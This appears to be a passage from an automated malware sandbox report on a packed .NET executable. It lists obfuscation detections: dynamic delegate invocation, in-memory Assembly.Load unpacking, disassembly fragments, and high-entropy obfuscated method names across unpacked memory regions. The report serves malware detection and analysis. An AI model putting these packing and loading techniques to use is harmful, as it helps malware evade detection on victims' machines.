                Source: Binary string: wntdll.pdb source: xU0wdBC6XWRZ6UY.exe, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: xU0wdBC6XWRZ6UY.exe, Login.cs.Net Code: InitializeComponent
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.cs.Net Code: S7OsFP35go System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_018FCF68 pushad ; iretd 3_2_018FCF69
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EB01E push es; retf 3_2_064EB020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064E2DE0 push edx; retf 3_2_064E2DF7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EBB8A pushad ; ret 3_2_064EBBA1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064EBB80 push eax; ret 3_2_064EBB81
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99F9E push ecx; retf 3_2_07C99F9F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99FAF push eax; retf 3_2_07C99FB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99D0E push ebx; retf 3_2_07C99D12
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C99D00 push esp; retf 3_2_07C99D01
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C9D3FE push esp; iretd 3_2_07C9D401
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C96198 pushfd ; retf 3_2_07C9619C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF902A push esp; ret 3_2_07CF902D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00401208 push esi; ret 11_2_0040120E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4F2 push eax; ret 11_2_0041D4F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4FB push eax; ret 11_2_0041D562
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D4A5 push eax; ret 11_2_0041D4F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D55C push eax; ret 11_2_0041D562
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF225F pushad ; ret 11_2_00FF27F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF27FA pushad ; ret 11_2_00FF27F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD push ecx; mov dword ptr [esp], ecx11_2_010209B6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF283D push eax; iretd 11_2_00FF2858
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF1368 push eax; iretd 11_2_00FF1369
                Source: C:\Windows\explorer.exeCode function: 12_2_086A1B02 push esp; retn 0000h12_2_086A1B03
                Source: C:\Windows\explorer.exeCode function: 12_2_086A1B1E push esp; retn 0000h12_2_086A1B1F
                Source: C:\Windows\explorer.exeCode function: 12_2_086A19B5 push esp; retn 0000h12_2_086A1AE7
                Source: C:\Windows\explorer.exeCode function: 12_2_0E829B02 push esp; retn 0000h12_2_0E829B03
                Source: C:\Windows\explorer.exeCode function: 12_2_0E829B1E push esp; retn 0000h12_2_0E829B1F
                Source: C:\Windows\explorer.exeCode function: 12_2_0E8299B5 push esp; retn 0000h12_2_0E829AE7
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_003374CD push ecx; ret 14_2_003374E0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC27FA pushad ; ret 14_2_04BC27F9
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC225F pushad ; ret 14_2_04BC27F9
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: section name: .text entropy: 7.7959310845493555
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, dPuWinwePpjqqHCFns.csHigh entropy of concatenated method names: 'nBfHADDSAI', 'AmJH64qstS', 'SQwHf5hrMv', 'YIaHUaOloU', 'k7QHlck4uQ', 'EN6H3Rko3p', 'zN2HPbHiGR', 'DajHjwyZ4t', 'VGCHKyav9U', 'hVAHcLZiaf'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, lW3SEhoCjxc3qX4lK2.csHigh entropy of concatenated method names: 'wHtEXjHJam', 'y6IEHkNyHZ', 'n9ME03dFKp', 'QtC0Cj0G5y', 'YUi0zmhL1u', 'v15EvDgxFC', 'MMBEumV4bC', 'zlZEb95mdt', 'UrQEJuxJPh', 'IR6EsyZP9J'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, sbKfnxHNobSaZlhNhl.csHigh entropy of concatenated method names: 'Dispose', 'iUVuB0ZpEL', 'nWPbSJPUh2', 'tMR22EP1rq', 'p9kuCvyVVY', 'tFOuzvd7ZD', 'ProcessDialogKey', 'GXcbvHf4qu', 'lpRbuAqjv3', 'Bhbbbuj3rA'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, Y7Z3Za75nAENBArWoe.csHigh entropy of concatenated method names: 'NScKuuNxlR', 'lorKJ3VT3V', 'Y7FKsYdV3S', 'Nn0KXp3eF5', 'd2KKrdE7sQ', 'CKsKt0HcvB', 'TeEK012qtu', 'LRMjntneoR', 'vd3jWdxehg', 'PThjB7fu8T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, vCEtuTzYHk8gOdpdHF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU', 'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, bffp9nNKfTCRJAQNXB.csHigh entropy of concatenated method names: 'nMVjXrgxi2', 'EuQjrppesQ', 'nvNjH0D42i', 'R27jtlWbTo', 'jahj0yuAJm', 'l8AjEMXiK8', 'ue7jdtrQu5', 'lMAjOAGEO3', 'e1fjDfqBq9', 'fDqjZ0HgJR'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, pCr6knlaScprUidGV1.csHigh entropy of concatenated method names: 'Pv2tiURTaZ', 'qyLtyHBxCp', 'yhMHxQIRfk', 'Du2HYMni24', 'MhiH9ktvjA', 'vOyHGQQtwC', 'dbAHen48dZ', 'yOOHNb8Eg2', 'WskHIc3t64', 'BNvH7T1HOC'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, QB6ppyRQvOmaM408Rf.csHigh entropy of concatenated method names: 'ToString', 'X7P3gRBuSa', 'pbM3SJJ7W3', 'mkI3x66e3o', 'nUM3YeGgaZ', 'kCL397aWM5', 'PlE3GgjFuU', 'Wbb3e8LPiX', 'ocY3NwEDwe', 'Rs33IxU1yL'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, iAPx3FWsia37RsC3kA.csHigh entropy of concatenated method names: 'XwfuEORRT4', 'PxSudAPmoQ', 'aIeuDKNap8', 'QNyuZZlnaW', 'mhFulqYNP0', 'ifWu3spGU9', 'rx6AQ0PjIkVkF2IBUx', 'fdhrqYTpnMoYLYWW0h', 'NkfuucMZ4Z', 'pQhuJvPFVr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, SgKFaGS2a4JTTirWdE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6QbBHwOFc', 'z7jbCHtGl6', 'hCtbz5Lc10', 'W1cJvluG7m', 'Bv3JuVeBQU', 'IVfJbajNFk', 'C9xJJPS4Uy', 'q21dEBju9jmVlRxjnyj'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, n2fTfG8U6T2RgZ194b.csHigh entropy of concatenated method names: 'sHIERGeHDq', 'fp0ET6ejo2', 'McLEFE0Nuc', 'K0YEAIFObV', 'wf2EiY5JTE', 'w4IE6PBlTc', 'jE7Eyh6Z2p', 'oa6Ef2Goo9', 'BVUEUb7vHl', 'VUFEVldlHB'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, vdRecDLWgIysvw14AQ.csHigh entropy of concatenated method names: 'zWCPDR9B8o', 'E8fPZYyy5J', 'ToString', 'Op5PXZ4lvD', 'pmMPrrEQ4P', 'aebPHRlggy', 'a3cPtRVRm7', 'x9SP0OBgDR', 'LZkPE6fArq', 'bg1PdyMgGr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, FMM21NApj7mkQgReR42.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L67ckYdPKL', 'mgacwqJboA', 'FLQc1J4WAk', 'BXOcaaUHAG', 'fpJc4hFaYS', 's7icLdiq0f', 'Q7VcnNdCoy'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, EYog2FvuV3pWUgICen.csHigh entropy of concatenated method names: 'YSO0Qc4brQ', 'oxD0rCx1Ak', 'yl20tKeng1', 'TDl0EeQwSg', 'W1x0dBWDgr', 'HK5t4HqVXK', 'al7tLOrmRk', 'NwytnHiSc8', 'BJvtWDo1AO', 'g28tB6uZyJ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, BMr7Oeh4xf4rlMegaY.csHigh entropy of concatenated method names: 'VmirkPqR8P', 'Xl3rwpav5r', 'FFwr1RbeBs', 'ibbratpSoW', 'NoAr4NR3wY', 'zYCrL3ewH6', 'V3ArnvNOi0', 'tkDrW7lNBy', 'qlXrB2pvDX', 'eYOrCuWJCQ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, YdFeQq9tHdqAswqADM.csHigh entropy of concatenated method names: 'KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P', 'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, E1M3iiERCnPP7Bm8X1.csHigh entropy of concatenated method names: 'iDeofTTCZ5', 'KhboUg2y5O', 'JGroqynYs2', 'AwpoS4H2DL', 'qfloYQrbxp', 'C41o9Fb59s', 'WhpoeP3CQr', 'roboNke413', 'ud7o71kso6', 'o3tog9SFiU'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KIEU43UyhBb4c8dFta.csHigh entropy of concatenated method names: 'UQEF5Gk1a', 'yHsA4M12V', 'B8o6kSO7e', 'd3hyNAyMo', 'nc6Usf2Yo', 'BXMVVYyMW', 'QN6ANmmX2bF5BcAUxS', 'V29V1OZAOaf22RE6Ts', 'AHWji6m7L', 'MgqcYDiZG'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, rFjhCiAGQph79Ypq2eY.csHigh entropy of concatenated method names: 'qdQKRqGXE7', 'MB0KTnTyy3', 'ArOKFxhc1l', 'GZ6KALK3Y1', 'NtWKiaQij0', 'M9nK6EVSGa', 'QJXKyv8TY7', 'oOeKf1v82W', 'peDKUP4ejg', 'o9QKV2ucO9'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.csHigh entropy of concatenated method names: 'i2ZJQHnghv', 'QM7JXQEZvr', 'NMjJr0dWsk', 'PVRJHjgxmq', 'MmGJtF8PGT', 'ycSJ0FXmqy', 'Uc7JEoEf0E', 'u7fJddJYHJ', 'scRJOFxWC7', 'yMiJDVtOi4'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, O5vIvyKmoj5ogVasPv.csHigh entropy of concatenated method names: 'FEkPWRB8vk', 'A6vPCil5Tl', 'NhOjvRYHhy', 'PGmjuHERtM', 'cxRPgVgXnH', 'rk2PmpTq54', 'iQdP5oHXLc', 'sKdPk4AtQY', 'NfePwbXWlT', 'myAP19FPDp'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, dPuWinwePpjqqHCFns.csHigh entropy of concatenated method names: 'nBfHADDSAI', 'AmJH64qstS', 'SQwHf5hrMv', 'YIaHUaOloU', 'k7QHlck4uQ', 'EN6H3Rko3p', 'zN2HPbHiGR', 'DajHjwyZ4t', 'VGCHKyav9U', 'hVAHcLZiaf'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, lW3SEhoCjxc3qX4lK2.csHigh entropy of concatenated method names: 'wHtEXjHJam', 'y6IEHkNyHZ', 'n9ME03dFKp', 'QtC0Cj0G5y', 'YUi0zmhL1u', 'v15EvDgxFC', 'MMBEumV4bC', 'zlZEb95mdt', 'UrQEJuxJPh', 'IR6EsyZP9J'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, sbKfnxHNobSaZlhNhl.csHigh entropy of concatenated method names: 'Dispose', 'iUVuB0ZpEL', 'nWPbSJPUh2', 'tMR22EP1rq', 'p9kuCvyVVY', 'tFOuzvd7ZD', 'ProcessDialogKey', 'GXcbvHf4qu', 'lpRbuAqjv3', 'Bhbbbuj3rA'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, Y7Z3Za75nAENBArWoe.csHigh entropy of concatenated method names: 'NScKuuNxlR', 'lorKJ3VT3V', 'Y7FKsYdV3S', 'Nn0KXp3eF5', 'd2KKrdE7sQ', 'CKsKt0HcvB', 'TeEK012qtu', 'LRMjntneoR', 'vd3jWdxehg', 'PThjB7fu8T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, vCEtuTzYHk8gOdpdHF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU', 'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, bffp9nNKfTCRJAQNXB.csHigh entropy of concatenated method names: 'nMVjXrgxi2', 'EuQjrppesQ', 'nvNjH0D42i', 'R27jtlWbTo', 'jahj0yuAJm', 'l8AjEMXiK8', 'ue7jdtrQu5', 'lMAjOAGEO3', 'e1fjDfqBq9', 'fDqjZ0HgJR'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, pCr6knlaScprUidGV1.csHigh entropy of concatenated method names: 'Pv2tiURTaZ', 'qyLtyHBxCp', 'yhMHxQIRfk', 'Du2HYMni24', 'MhiH9ktvjA', 'vOyHGQQtwC', 'dbAHen48dZ', 'yOOHNb8Eg2', 'WskHIc3t64', 'BNvH7T1HOC'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, QB6ppyRQvOmaM408Rf.csHigh entropy of concatenated method names: 'ToString', 'X7P3gRBuSa', 'pbM3SJJ7W3', 'mkI3x66e3o', 'nUM3YeGgaZ', 'kCL397aWM5', 'PlE3GgjFuU', 'Wbb3e8LPiX', 'ocY3NwEDwe', 'Rs33IxU1yL'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, iAPx3FWsia37RsC3kA.csHigh entropy of concatenated method names: 'XwfuEORRT4', 'PxSudAPmoQ', 'aIeuDKNap8', 'QNyuZZlnaW', 'mhFulqYNP0', 'ifWu3spGU9', 'rx6AQ0PjIkVkF2IBUx', 'fdhrqYTpnMoYLYWW0h', 'NkfuucMZ4Z', 'pQhuJvPFVr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, SgKFaGS2a4JTTirWdE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6QbBHwOFc', 'z7jbCHtGl6', 'hCtbz5Lc10', 'W1cJvluG7m', 'Bv3JuVeBQU', 'IVfJbajNFk', 'C9xJJPS4Uy', 'q21dEBju9jmVlRxjnyj'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, n2fTfG8U6T2RgZ194b.csHigh entropy of concatenated method names: 'sHIERGeHDq', 'fp0ET6ejo2', 'McLEFE0Nuc', 'K0YEAIFObV', 'wf2EiY5JTE', 'w4IE6PBlTc', 'jE7Eyh6Z2p', 'oa6Ef2Goo9', 'BVUEUb7vHl', 'VUFEVldlHB'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, vdRecDLWgIysvw14AQ.csHigh entropy of concatenated method names: 'zWCPDR9B8o', 'E8fPZYyy5J', 'ToString', 'Op5PXZ4lvD', 'pmMPrrEQ4P', 'aebPHRlggy', 'a3cPtRVRm7', 'x9SP0OBgDR', 'LZkPE6fArq', 'bg1PdyMgGr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, FMM21NApj7mkQgReR42.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L67ckYdPKL', 'mgacwqJboA', 'FLQc1J4WAk', 'BXOcaaUHAG', 'fpJc4hFaYS', 's7icLdiq0f', 'Q7VcnNdCoy'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, EYog2FvuV3pWUgICen.csHigh entropy of concatenated method names: 'YSO0Qc4brQ', 'oxD0rCx1Ak', 'yl20tKeng1', 'TDl0EeQwSg', 'W1x0dBWDgr', 'HK5t4HqVXK', 'al7tLOrmRk', 'NwytnHiSc8', 'BJvtWDo1AO', 'g28tB6uZyJ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, BMr7Oeh4xf4rlMegaY.csHigh entropy of concatenated method names: 'VmirkPqR8P', 'Xl3rwpav5r', 'FFwr1RbeBs', 'ibbratpSoW', 'NoAr4NR3wY', 'zYCrL3ewH6', 'V3ArnvNOi0', 'tkDrW7lNBy', 'qlXrB2pvDX', 'eYOrCuWJCQ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, YdFeQq9tHdqAswqADM.csHigh entropy of concatenated method names: 'KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P', 'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, E1M3iiERCnPP7Bm8X1.csHigh entropy of concatenated method names: 'iDeofTTCZ5', 'KhboUg2y5O', 'JGroqynYs2', 'AwpoS4H2DL', 'qfloYQrbxp', 'C41o9Fb59s', 'WhpoeP3CQr', 'roboNke413', 'ud7o71kso6', 'o3tog9SFiU'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KIEU43UyhBb4c8dFta.csHigh entropy of concatenated method names: 'UQEF5Gk1a', 'yHsA4M12V', 'B8o6kSO7e', 'd3hyNAyMo', 'nc6Usf2Yo', 'BXMVVYyMW', 'QN6ANmmX2bF5BcAUxS', 'V29V1OZAOaf22RE6Ts', 'AHWji6m7L', 'MgqcYDiZG'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, rFjhCiAGQph79Ypq2eY.csHigh entropy of concatenated method names: 'qdQKRqGXE7', 'MB0KTnTyy3', 'ArOKFxhc1l', 'GZ6KALK3Y1', 'NtWKiaQij0', 'M9nK6EVSGa', 'QJXKyv8TY7', 'oOeKf1v82W', 'peDKUP4ejg', 'o9QKV2ucO9'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.csHigh entropy of concatenated method names: 'i2ZJQHnghv', 'QM7JXQEZvr', 'NMjJr0dWsk', 'PVRJHjgxmq', 'MmGJtF8PGT', 'ycSJ0FXmqy', 'Uc7JEoEf0E', 'u7fJddJYHJ', 'scRJOFxWC7', 'yMiJDVtOi4'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, O5vIvyKmoj5ogVasPv.csHigh entropy of concatenated method names: 'FEkPWRB8vk', 'A6vPCil5Tl', 'NhOjvRYHhy', 'PGmjuHERtM', 'cxRPgVgXnH', 'rk2PmpTq54', 'iQdP5oHXLc', 'sKdPk4AtQY', 'NfePwbXWlT', 'myAP19FPDp'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, dPuWinwePpjqqHCFns.csHigh entropy of concatenated method names: 'nBfHADDSAI', 'AmJH64qstS', 'SQwHf5hrMv', 'YIaHUaOloU', 'k7QHlck4uQ', 'EN6H3Rko3p', 'zN2HPbHiGR', 'DajHjwyZ4t', 'VGCHKyav9U', 'hVAHcLZiaf'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, lW3SEhoCjxc3qX4lK2.csHigh entropy of concatenated method names: 'wHtEXjHJam', 'y6IEHkNyHZ', 'n9ME03dFKp', 'QtC0Cj0G5y', 'YUi0zmhL1u', 'v15EvDgxFC', 'MMBEumV4bC', 'zlZEb95mdt', 'UrQEJuxJPh', 'IR6EsyZP9J'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, sbKfnxHNobSaZlhNhl.csHigh entropy of concatenated method names: 'Dispose', 'iUVuB0ZpEL', 'nWPbSJPUh2', 'tMR22EP1rq', 'p9kuCvyVVY', 'tFOuzvd7ZD', 'ProcessDialogKey', 'GXcbvHf4qu', 'lpRbuAqjv3', 'Bhbbbuj3rA'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, Y7Z3Za75nAENBArWoe.csHigh entropy of concatenated method names: 'NScKuuNxlR', 'lorKJ3VT3V', 'Y7FKsYdV3S', 'Nn0KXp3eF5', 'd2KKrdE7sQ', 'CKsKt0HcvB', 'TeEK012qtu', 'LRMjntneoR', 'vd3jWdxehg', 'PThjB7fu8T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, vCEtuTzYHk8gOdpdHF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU', 'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, bffp9nNKfTCRJAQNXB.csHigh entropy of concatenated method names: 'nMVjXrgxi2', 'EuQjrppesQ', 'nvNjH0D42i', 'R27jtlWbTo', 'jahj0yuAJm', 'l8AjEMXiK8', 'ue7jdtrQu5', 'lMAjOAGEO3', 'e1fjDfqBq9', 'fDqjZ0HgJR'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, pCr6knlaScprUidGV1.csHigh entropy of concatenated method names: 'Pv2tiURTaZ', 'qyLtyHBxCp', 'yhMHxQIRfk', 'Du2HYMni24', 'MhiH9ktvjA', 'vOyHGQQtwC', 'dbAHen48dZ', 'yOOHNb8Eg2', 'WskHIc3t64', 'BNvH7T1HOC'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, QB6ppyRQvOmaM408Rf.csHigh entropy of concatenated method names: 'ToString', 'X7P3gRBuSa', 'pbM3SJJ7W3', 'mkI3x66e3o', 'nUM3YeGgaZ', 'kCL397aWM5', 'PlE3GgjFuU', 'Wbb3e8LPiX', 'ocY3NwEDwe', 'Rs33IxU1yL'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, iAPx3FWsia37RsC3kA.csHigh entropy of concatenated method names: 'XwfuEORRT4', 'PxSudAPmoQ', 'aIeuDKNap8', 'QNyuZZlnaW', 'mhFulqYNP0', 'ifWu3spGU9', 'rx6AQ0PjIkVkF2IBUx', 'fdhrqYTpnMoYLYWW0h', 'NkfuucMZ4Z', 'pQhuJvPFVr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, SgKFaGS2a4JTTirWdE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6QbBHwOFc', 'z7jbCHtGl6', 'hCtbz5Lc10', 'W1cJvluG7m', 'Bv3JuVeBQU', 'IVfJbajNFk', 'C9xJJPS4Uy', 'q21dEBju9jmVlRxjnyj'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, n2fTfG8U6T2RgZ194b.csHigh entropy of concatenated method names: 'sHIERGeHDq', 'fp0ET6ejo2', 'McLEFE0Nuc', 'K0YEAIFObV', 'wf2EiY5JTE', 'w4IE6PBlTc', 'jE7Eyh6Z2p', 'oa6Ef2Goo9', 'BVUEUb7vHl', 'VUFEVldlHB'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, vdRecDLWgIysvw14AQ.csHigh entropy of concatenated method names: 'zWCPDR9B8o', 'E8fPZYyy5J', 'ToString', 'Op5PXZ4lvD', 'pmMPrrEQ4P', 'aebPHRlggy', 'a3cPtRVRm7', 'x9SP0OBgDR', 'LZkPE6fArq', 'bg1PdyMgGr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, FMM21NApj7mkQgReR42.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L67ckYdPKL', 'mgacwqJboA', 'FLQc1J4WAk', 'BXOcaaUHAG', 'fpJc4hFaYS', 's7icLdiq0f', 'Q7VcnNdCoy'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, EYog2FvuV3pWUgICen.csHigh entropy of concatenated method names: 'YSO0Qc4brQ', 'oxD0rCx1Ak', 'yl20tKeng1', 'TDl0EeQwSg', 'W1x0dBWDgr', 'HK5t4HqVXK', 'al7tLOrmRk', 'NwytnHiSc8', 'BJvtWDo1AO', 'g28tB6uZyJ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, BMr7Oeh4xf4rlMegaY.csHigh entropy of concatenated method names: 'VmirkPqR8P', 'Xl3rwpav5r', 'FFwr1RbeBs', 'ibbratpSoW', 'NoAr4NR3wY', 'zYCrL3ewH6', 'V3ArnvNOi0', 'tkDrW7lNBy', 'qlXrB2pvDX', 'eYOrCuWJCQ'
